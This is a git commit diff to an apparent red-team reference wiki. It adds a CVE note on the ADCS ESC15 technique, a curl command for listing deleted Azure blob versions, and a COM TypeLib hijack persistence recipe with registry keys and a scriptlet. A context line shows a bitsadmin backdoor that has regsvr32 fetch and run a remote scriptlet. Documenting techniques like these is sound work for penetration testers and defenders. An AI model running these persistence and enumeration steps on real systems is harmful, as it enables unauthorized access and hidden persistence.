COM Persistence + EKUwu CVE + Deleted Blobs from Azure Storage

2024-11-14 13:15:04 +01:00 · 2024-11-14 13:15:04 +01:00 · ea7e265dac
parent bb0b447d12
commit ea7e265dac
3 changed files with 78 additions and 2 deletions
--- a/docs/active-directory/ad-adcs-certificate-services.md
+++ b/docs/active-directory/ad-adcs-certificate-services.md
@ -423,7 +423,10 @@ Members           : {}
  ```


-## ESC15 - EKUwu Application Policies
+## ESC15 - EKUwu Application Policies - CVE-2024-49019
+
+This technique now has a CVE number and was patched on November 12, See [Active Directory Certificate Services Elevation of Privilege Vulnerability - CVE-2024-49019](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49019) for more information.
+

 **Requirements**

--- a/docs/cloud/azure/azure-services-storage-blob.md
+++ b/docs/cloud/azure/azure-services-storage-blob.md
@ -17,6 +17,40 @@ Found Storage Account -  redacted.blob.core.windows.net

 ## List and download blobs

+Visiting `https://<storage-name>.blob.core.windows.net/<storage-container>?restype=container&comp=list` provides a JSON file containing a complete list of the Azure Blobs.
+
+```xml
+<EnumerationResults ContainerName="https://<storage-name>.blob.core.windows.net/<storage-container>">
+    <Blobs>
+        <Blob>
+            <Name>index.html</Name>
+            <Url>https://<storage-name>.blob.core.windows.net/<storage-container>/index.html</Url>
+            <Properties>
+            <Last-Modified>Fri, 20 Oct 2023 20:08:20 GMT</Last-Modified>
+            <Etag>0x8DBD1A84E6455C0</Etag>
+            <Content-Length>782359</Content-Length>
+            <Content-Type>text/html</Content-Type>
+            <Content-Encoding/>
+            <Content-Language/>
+            <Content-MD5>JSe+sM+pXGAEFInxDgv4CA==</Content-MD5>
+            <Cache-Control/>
+            <BlobType>BlockBlob</BlobType>
+            <LeaseStatus>unlocked</LeaseStatus>
+            </Properties>
+        </Blob>
+```
+
+Browse deleted files.
+
+```ps1
+$ curl -s -H "x-ms-version: 2019-12-12" 'https://<storage-name>.blob.core.windows.net/<storage-container>?restype=container&comp=list&include=versions' | xmllint --format - | grep Name
+
+<EnumerationResults ServiceEndpoint="https://<storage-name>.blob.core.windows.net/" ContainerName="<storage-container>">
+      <Name>index.html</Name>
+      <Name>scripts-transfer.zip</Name>
+```
+
+
 ```powershell
 PS Az> Get-AzResource
 PS Az> Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>
--- a/docs/redteam/persistence/windows-persistence.md
+++ b/docs/redteam/persistence/windows-persistence.md
@ -242,6 +242,44 @@ bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/s /n /u /i:http://10.10.10.1
 bitsadmin /resume backdoor
 ```

+
+### COM TypeLib
+
+* [CICADA8-Research/TypeLibWalker](https://github.com/CICADA8-Research/TypeLibWalker) - TypeLib persistence technique
+
+Use [sysinternals/procmon](https://learn.microsoft.com/fr-fr/sysinternals/downloads/procmon) to find `RegOpenKey` with the status `NAME NOT FOUND`. The process `explorer.exe` is a good target, as it will spawn your payload every time it is run.
+
+
+```ps1
+Path: HKCU\Software\Classes\TypeLib\{CLSID}\1.1\0\win32
+Path: HKCU\Software\Classes\TypeLib\{CLSID}\1.1\0\win64
+Name: anything
+Type: REG_SZ
+Value: script:C:\1.sct
+```
+
+Example of content for `1.sct`.
+
+```xml
+<?xml version="1.0"?>
+<scriptlet>
+    <registration
+        description="explorer"
+        progid="explorer"
+        version="1.0"
+        classid="{66666666-6666-6666-6666-666666666666}"
+        remotable="true">
+    </registration>
+    <script language="JScript">
+        <![CDATA[
+            var WShell = new ActiveXObject("WScript.Shell");
+            WShell.Run("calc.exe");
+        ]]>
+    </script>
+</scriptlet>
+```
+
+
 ## Serviceland

 ### IIS
@ -623,3 +661,4 @@ Set-DomainObject -Identity <target_machine> -Set @{"ms-mcs-admpwdexpirationtime"
 * [Persistence via WMI Event Subscription - Elastic Security Solution](https://www.elastic.co/guide/en/security/current/persistence-via-wmi-event-subscription.html)
 * [PrivEsc: Abusing the Service Control Manager for Stealthy & Persistent LPE - 0xv1n - 2023-02-27](https://0xv1n.github.io/posts/scmanager/)
 * [Sc sdset - Microsoft - 08/31/2016](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742037(v=ws.11))
+* [Hijack the TypeLib. New COM persistence technique - CICADA8 - October 22, 2024](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661)